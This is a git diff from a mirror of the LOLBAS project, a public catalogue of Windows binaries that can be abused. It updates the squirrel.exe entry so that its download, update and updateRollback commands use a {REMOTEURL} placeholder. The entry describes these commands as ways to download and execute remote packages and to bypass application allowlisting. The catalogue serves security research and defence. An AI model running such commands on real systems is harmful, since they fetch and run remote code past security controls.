mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
@@ -4,14 +4,14 @@ Description: Binary to update the existing installed Nuget/squirrel package. Par
|
||||
Author: 'Reegun J (OCBC Bank) - @reegun21'
|
||||
Created: 2019-06-26
|
||||
Commands:
|
||||
- Command: squirrel.exe --download [url to package]
|
||||
- Command: squirrel.exe --download {REMOTEURL}
|
||||
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
||||
Usecase: Download binary
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: squirrel.exe --update [url to package]
|
||||
- Command: squirrel.exe --update {REMOTEURL}
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
Category: AWL Bypass
|
||||
@@ -21,7 +21,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: squirrel.exe --update [url to package]
|
||||
- Command: squirrel.exe --update {REMOTEURL}
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
Category: Execute
|
||||
@@ -31,7 +31,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: squirrel.exe --updateRollback=[url to package]
|
||||
- Command: squirrel.exe --updateRollback={REMOTEURL}
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
Category: AWL Bypass
|
||||
@@ -41,7 +41,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: squirrel.exe --updateRollback=[url to package]
|
||||
- Command: squirrel.exe --updateRollback={REMOTEURL}
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
Category: Execute
|
||||
|
Reference in New Issue
Block a user